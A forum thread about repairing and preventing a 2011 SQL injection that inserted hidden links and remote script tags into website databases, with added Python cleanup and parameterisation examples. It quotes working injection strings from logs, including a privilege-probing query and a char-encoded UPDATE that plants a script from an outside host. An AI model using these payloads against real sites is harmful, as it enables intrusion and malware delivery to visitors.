What's causing ""-link hack?

Posted on 2011-09-13
Last Modified: 2012-05-12
Look at this:

A lot of sites that have been hacked with the same hidden link to

What's causing this? How do they do it? How to prevent it?

Question by: Alfahane

Expert Comment

ID: 36530606
Same question here. I'd appreciate a quick answer!
Having a problem with one SQL 2008 server; this server is not publicly accessible. Only a limited range of servers can access it, and not all of those servers are our servers...

Can you tell what your environment is?

Author Comment

ID: 36530772
SQL 2000

Author Comment

ID: 36530831
Do you have problems with several databases on one server only?

Expert Comment

ID: 36531296
Only one database on one server. The server has 50 databases.
The database is accessed from outside. But I don't know for sure whether it is the external user that caused this injection or one of our servers.
I think (and hope) it is not one of our servers that is injecting. But I want to be sure...

Expert Comment

ID: 36544222
Hi guys

It'll be a simple injection attack that's gotten past one of your web-facing applications linking to the affected databases. I've just cleaned up some systems with the exact same issue.

If you're reluctant to restore to avoid data loss, I can repair the data for you fairly quickly; just contact me and we can sort something out.

I can also pinpoint and plug the vulnerability in your application for you as well, so this particular issue won't happen again.

All the best :)

Expert Comment

ID: 36546445
Been having the same issue for 2 days. Not only are we seeing this in a SQL 2008 database, but it is also adding it to files being written on our web server. Need help!

Expert Comment

ID: 36548523
In addition to repairing, I can set your system up to provide an immediate report via email. Some of the key things it shows are:
the attack vector (what part of your application the attacker was trying to attack),
the source IP,
the actual injection attempt,
the symbols used to help detect it, and
the corresponding URL.
Here's one of many reports that a client of mine received from attacks originating out of China just last night, partially censored for obvious reasons:

Dirty Data
Injection Vector: ivDirectQueryString
Target Type: vbString
Number of hits: 4
Value: 25 AND (CAST(IS_SRVROLEMEMBER(0X730079007300610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X64006200630072006500610074006F007200)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X620075006C006B00610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X6400690073006B00610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X730065007200760065007200610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X7000750062006C0069006300) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006F0077006E0065007200) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006200610063006B00750070006F00700065007200610074006F007200) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006400610074006100770072006900740065007200) AS VARCHAR))=0 
Referring Page:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
URL: /path/subpath/page.asp?id=25 and (cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x64006200630072006500610074006F007200)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x620075006C006B00610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x6400690073006B00610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x730065007200760065007200610064006D0069006E00)as varchar)+char(94)+cast(IS_MEMBER (0x7000750062006C0069006300) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006F0077006E0065007200) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006200610063006B00750070006F00700065007200610074006F007200) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006400610074006100770072006900740065007200) as varchar))=0 
Symbols: cast / varchar / = / (0x

Expert Comment

ID: 36567705
A website of mine has been affected by this issue. I restored the database and ensured that ONLY parameterised queries are used throughout the website.

Today the website has been targeted again, this time with:
</title><script src=></script>

There is no relevant information in the event log. Does anyone know what is causing this?

Expert Comment

ID: 36567890
G'day mate

Yes, you still have a vulnerability in your application. There is no "answer" for this, you'll need to review your application more closely in order to find the problem.


Accepted Solution

jdcrane earned 375 total points
ID: 36569910
</title><a style=position:absolute;left:-9999px;top:-9999px; href= >crack</a>
</title><script src=></script>

There are a few things you'd need to do in order to rid yourself of the above permanently. They are:

1. If you want to retain data created since the attack occurred, take any website that links to the database(s) concerned offline.

2. Review your logs to determine where the attack vector was, e.g. URL querystring etc. It's OK if you can't see anything.

3. Review your code in detail and resolve the vulnerabilities; the location of the injected content will assist with determining where the vulnerabilities are in your application.

4. Repair the data or restore a database backup, the latter only if you don't want to retain new data created since the attack occurred.

5. Put your site(s) back online.

<advertising link removed by RockMod 20 Sept '11>
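
The "repair the data" step above, as an added example that is not part of the thread or any participant's code: scan every character column in the database for the injected marker and cut each affected value back to what it held before the attacker's UPDATE appended the markup. SQLite stands in for SQL Server here (its catalogue is sqlite_master plus PRAGMA table_info; on SQL Server the equivalent walks INFORMATION_SCHEMA.COLUMNS), the two tables and their rows are constructed, and the injected string is the one quoted in this answer, with the URL already removed by the moderators.

```python
"""Locate and strip the appended markup from every text column.

Added example, not code from the thread. SQLite stands in for SQL Server;
the tables and rows in make_sample_db() are constructed for illustration.
"""
import sqlite3

MARKER = "</title>"                              # both payloads quoted above start with this
INJECTED = "</title><script src=></script>"     # as quoted above, URL removed by the moderators

# Declared types treated as character data (SQLite keeps the declared name).
TEXT_TYPES = ("TEXT", "CHAR", "VARCHAR", "NVARCHAR", "NCHAR", "CLOB")


def make_sample_db():
    """Constructed sample: two affected values, one untouched, one NULL."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE Clients (id INTEGER PRIMARY KEY, ClientName TEXT, Notes TEXT);
        CREATE TABLE Pages   (id INTEGER PRIMARY KEY, Title TEXT, Views INTEGER);
        INSERT INTO Clients VALUES (1, 'Acme Ltd{INJECTED}', 'paid');
        INSERT INTO Clients VALUES (2, 'Beta Inc', 'call back{INJECTED}');
        INSERT INTO Clients VALUES (3, 'Gamma', NULL);
        INSERT INTO Pages   VALUES (1, 'Home', 10);
    """)
    return conn


def text_columns(conn):
    """Yield (table, column) for every character column in the user tables."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        # PRAGMA table_info rows: cid, name, type, notnull, dflt_value, pk
        for _cid, name, ctype, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
            if ctype.upper().split("(")[0] in TEXT_TYPES:
                yield table, name


def find_injected(conn, marker=MARKER):
    """(table, column, affected row count) for every column containing the marker.
    Identifiers come from the catalogue, not from user input, and are quoted;
    the marker itself is bound as a parameter."""
    hits = []
    for table, col in text_columns(conn):
        n = conn.execute(f'SELECT count(*) FROM "{table}" WHERE instr("{col}", ?) > 0',
                         (marker,)).fetchone()[0]
        if n:
            hits.append((table, col, n))
    return hits


def strip_injected(conn, marker=MARKER):
    """Cut each affected value at the marker. The UPDATE in the IIS log line
    appended the markup to the existing value (cast(col)+cast(markup)), so
    everything before the marker is the original content."""
    fixed = 0
    for table, col, _ in find_injected(conn, marker):
        cur = conn.execute(
            f'UPDATE "{table}" SET "{col}" = substr("{col}", 1, instr("{col}", ?) - 1) '
            f'WHERE instr("{col}", ?) > 0', (marker, marker))
        fixed += cur.rowcount
    conn.commit()
    return fixed


def repair_demo():
    """Run the scan, the repair and a re-scan on the constructed sample."""
    conn = make_sample_db()
    before = find_injected(conn)
    fixed = strip_injected(conn)
    names = [r[0] for r in conn.execute("SELECT ClientName FROM Clients ORDER BY id")]
    return {"before": before, "fixed": fixed, "after": find_injected(conn), "names": names}


if __name__ == "__main__":
    print(repair_demo())
```

Keep the output of find_injected before repairing: the list of affected tables and columns tells you which pages write those values, which is the lead the code-review step needs. Truncating at the marker is only correct for this payload family, which appended to the existing value; a payload that overwrote values needs a restore, which is why the step above offers the backup as the alternative.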

Expert Comment

ID: 36572859
For anyone that is experiencing this problem, here is an entry from the website log:

(815  ) 2011-09-20 12:00:39 192.168.x.x GET /affected-page.aspx id=631'+update+DatabaseTableName+set+NameOfClient=cast(ClientName+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(100)%2Bchar(102)%2Bchar(114)%2Bchar(103)%2Bchar(99)%2Bchar(99)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))-- 80 - Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20780624+Netscape/7.1+(ax) 200 0 0

This is very similar to the LizaMoon hack a few months ago.

As you can see, the querystring contains ASCII characters to disguise the query.

I have used a parameterised query on this page, restricting the input to int (integer).

The id querystring is also inspected to ensure it is an integer before the SqlCommand is run against the database; this does not prevent the hack.

Any ideas?

Assisted Solution

jdcrane earned 375 total points
ID: 36573405
Deploy a test version of your site and debug the same request. I think you'll find that, if this was in fact the successful injection that corrupted your system, you can't be vetting the querystring properly. Also, depending on how you parameterised the query or SP, it may not protect you from injection. If DatabaseTableName and NameOfClient are literals, they have to be retrieved from somewhere; otherwise it's a remarkably accurate guess (i.e. you were targeted). You might find there's another injection that pulls back or transmits the result to the attacking client for parsing and follow-up injections like the above.
Assisted Solution

lherrou earned 125 total points
ID: 36573550
And don't forget, once you've completed your recovery in your database, check around for other backdoors that the hackers may have left. I've seen that more than once, where they leave a new directory or file with a file uploader tool, etc., to give them access again.

Expert Comment

ID: 36597918
Would it improve matters if you restricted the number of characters in the querystring parameter? I.e. your code would only run if the parameter was an integer AND fewer than ten chars?
I ask because we face the same issue.

Assisted Solution

jdcrane earned 375 total points
ID: 36599510
If you're expecting an integer from a web parameter, you should be using the value returned from your conversion function (e.g. int, intval), not the parameter directly.

If you're expecting a non-numeric string literal, it's best to be fishing for SQL injection symbols and halting further action upon detection of suspicious activity. If you can't post source and sample querystrings,
your particular circumstances won't be exempt from the techniques referred to in the many in-depth guides out there for protecting yourself from injection.
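
What "use the value returned from your conversion function, not the parameter directly" looks like in practice, as an added example that is not code from the thread or from any participant: the vulnerable lookup glues the raw id into the statement, the hardened one converts first and binds the converted integer. SQLite stands in for SQL Server, the table and rows are constructed, and the true/false probe pair is a simplified form of the boolean-blind technique in the emailed report (IS_SRVROLEMEMBER does not exist in SQLite, but the mechanism, comparing the page for a true and a false condition, is the same).

```python
"""The page.asp?id=... lookup, vulnerable and hardened.

Added example, not code from the thread. SQLite stands in for SQL Server;
the Page table, its rows and the probe strings are constructed.
"""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Page (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO Page VALUES (?, ?)",
                     [(25, "Products"), (26, "About")])
    return conn


def lookup_vulnerable(conn, id_param):
    """Raw querystring value glued into the statement: whatever follows the
    number becomes SQL, which is how the probe in the report reached the
    database. (SQL Server would also run a trailing batch such as the UPDATE
    in the IIS log line; SQLite refuses multi-statement strings here.)"""
    sql = "SELECT title FROM Page WHERE id=" + id_param
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, id_param):
    """Convert, then bind the converted int. "25 AND 1=1" never reaches the
    database: int() raises ValueError. Checking the string and then still
    concatenating the original does not help; the converted value must be
    the one that feeds the query."""
    page_id = int(id_param.strip())
    rows = conn.execute("SELECT title FROM Page WHERE id=?", (page_id,))
    return [row[0] for row in rows]


def leaks_condition(conn, lookup, base="25"):
    """Boolean-blind probe as in the emailed report: if the page differs
    between a true and a false condition, the attacker can ask yes/no
    questions (e.g. IS_SRVROLEMEMBER('sysadmin')=1) one at a time.
    Returns None when the lookup rejects the value outright."""
    try:
        return lookup(conn, base + " AND 1=1") != lookup(conn, base + " AND 1=2")
    except ValueError:
        return None


def demo():
    conn = make_db()
    return {
        "vulnerable_leaks": leaks_condition(conn, lookup_vulnerable),  # True
        "safe_leaks": leaks_condition(conn, lookup_safe),              # None: rejected
        "safe_normal": lookup_safe(conn, "25"),                        # ['Products']
    }


if __name__ == "__main__":
    print(demo())
```

The same rule applies to stored procedures: a procedure that builds dynamic SQL from its arguments is as injectable as inline code, which is the caveat in the earlier comment about how the query or SP was parameterised. A length limit on the parameter, as asked about above, shortens what an attacker can send in one request but does not stop a short boolean probe; the conversion does.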

Author Closing Comment

ID: 36948014
I'm asked by EE to close this question as it has been given the status "Abandoned".

I guess we can all agree that there is not one simple way to solve this problem, other than to review our programming code more and hope that the next clever hack will not come too soon.
